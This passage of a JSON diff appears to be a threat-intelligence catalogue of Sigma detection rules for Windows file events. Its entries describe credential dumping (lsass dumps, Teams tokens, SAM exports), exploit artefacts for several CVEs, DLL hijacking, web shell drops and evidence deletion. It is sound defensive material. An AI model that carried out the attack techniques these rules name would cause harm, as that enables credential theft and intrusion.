+ "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/05/02", + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitime usage of SDelete" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/09/16", + "filename": "file_delete_win_webserver_access_logs_deleted.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "During uninstallation of the IIS service", + "During log rotation" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/09/16", + "filename": "file_event_win_access_susp_teams.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/12/19", + "filename": "file_event_win_access_susp_unattend_xml.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/05/12", + "filename": "file_event_win_advanced_ip_scanner.yml", + "author": "@ROxPinTeddy", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "file_event_win_anydesk_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/28", + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "value": "Unidentified Attacker November 2018 - File", + "meta": { + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2018/11/20", + "filename": "file_event_win_apt_unidentified_nov_18.yml", + "author": "@41thexplorer, Microsoft Defender ATP", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files", + "meta": { + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/09", + "filename": "file_event_win_bloodhound_collection.yml", + "author": "C.J. May", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns", + "meta": { + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/03/12", + "filename": "file_event_win_crackmapexec_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": "file_event_win_create_non_existent_dlls.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/29", + "filename": "file_event_win_creation_new_shim_database.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ], + "creation_date": "2021/12/29", + "filename": "file_event_win_creation_scr_binary_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/05/26", + "filename": "file_event_win_creation_system_file.yml", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "value": "Creation Exe for Service with Unquoted Path", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/30", + "filename": "file_event_win_creation_unquoted_service_path.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" + ], + "creation_date": "2019/11/01", + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "value": "WScript or CScript Dropper - File", + "meta": { + "refs": [ + "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/10", + "filename": "file_event_win_cscript_wscript_dropper.yml", + "author": "Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ], + "creation_date": "2022/01/09", + "filename": "file_event_win_csharp_compile_artefact.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ], + "creation_date": "2021/06/29", + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "value": "CVE-2021-26858 Exchange Exploitation", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26858" + ], + "creation_date": "2021/03/03", + "filename": "file_event_win_cve_2021_26858_msexchange.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ], + "creation_date": "2021/07/16", + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "author": "Sittikorn S", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/11/22", + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": "CVE-2021-44077 POC Default Dropped File", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ], + "creation_date": "2022/06/06", + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ], + "creation_date": "2022/04/13", + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "value": "Powerup Write Hijack DLL", + "meta": { + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" + ], + "creation_date": "2021/08/21", + "filename": "file_event_win_detect_powerup_dllhijacking.yml", + "author": "Subhash Popuri (@pbssubhash)", + "level": "high", + "falsepositive": [ + "Any powershell script that creates bat files" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/07/30", + "filename": "file_event_win_dll_sideloading_space_path.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Persistence Via ErrorHandler.Cmd", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/09", + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2022/10/01", + "filename": "file_event_win_exchange_webshell_drop.yml", + "author": "Florian Roth (rule), MSTI (query, idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" + ], + "creation_date": "2022/10/04", + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename", + "meta": { + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2018/07/24", + "filename": "file_event_win_ghostpack_safetykatz.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "value": "GoToAssist Temporary Installation Artefact", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "file_event_win_gotoopener_artefact.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "value": "Dumpert Process Dumper Default File", + "meta": { + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/02/04", + "filename": "file_event_win_hack_dumpert.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" + ], + "creation_date": "2021/07/23", + "filename": "file_event_win_hivenightmare_file_exports.yml", + 